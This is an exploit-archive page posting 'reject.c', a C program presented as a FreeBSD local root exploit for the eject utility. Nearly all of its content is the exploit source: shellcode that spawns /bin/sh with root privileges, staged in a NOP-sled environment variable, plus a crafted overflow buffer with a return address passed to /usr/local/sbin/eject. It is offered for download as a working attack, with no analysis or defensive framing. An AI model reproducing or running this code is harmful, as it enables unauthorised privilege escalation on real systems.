what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

reject.c

reject.c
Posted Mar 27, 2007
Authored by Sacrine | Site netric.org

FreeBSD local root eject exploit.

tags | exploit, local, root
systems | freebsd
SHA-256 | 3cb81eca9049f33276d079a740b85efee76c56f9266a5856257c94f1ba9436b1

reject.c

Change Mirror Download
// reject.c - FreeBSD local root eject exploit
// vuln found by kokanin :)
// sacrine - sacrine.netric.org

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>

#define BUFLEN 1264
#define NOP 0x90
#define EGG 1024

char shellcode[] =
"\x55\x89\xe5\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

int main
(int c, char *v[])
{
unsigned long ret = 0xbfbfee16;
char buffer[BUFLEN];
char eitje[1024];
char *ptr;
int i = 0;

if (c > 1)
ret = ret - atol(v[1]) ;

memset(buffer,NOP,sizeof(buffer));
ptr=eitje;

for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90';
for (i=0; i<strlen(shellcode);i++)*(ptr++) = shellcode[i];

eitje[1024-1] = '\0';
memcpy(eitje,"EGG=",4);
putenv(eitje);

memset(buffer, 0x41, sizeof(buffer));
buffer[BUFLEN-5] = (ret & 0x000000ff);
buffer[BUFLEN-4] = (ret & 0x0000ff00) >> 8;
buffer[BUFLEN-3] = (ret & 0x00ff0000) >> 16;
buffer[BUFLEN-2] = (ret & 0xff000000) >> 24;
buffer[BUFLEN-1] = 0x00;

fprintf(stdout,"[reject.c - local root eject exploit]\n\n"
" ret: 0x%x\n"
" buf: %d\n\n",ret,strlen(buffer));

if (execl("/usr/local/sbin/eject","reject","-t", buffer, NULL) ==-1)
{
perror("execl()");
exit(EXIT_FAILURE);
}
return(0);
}


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close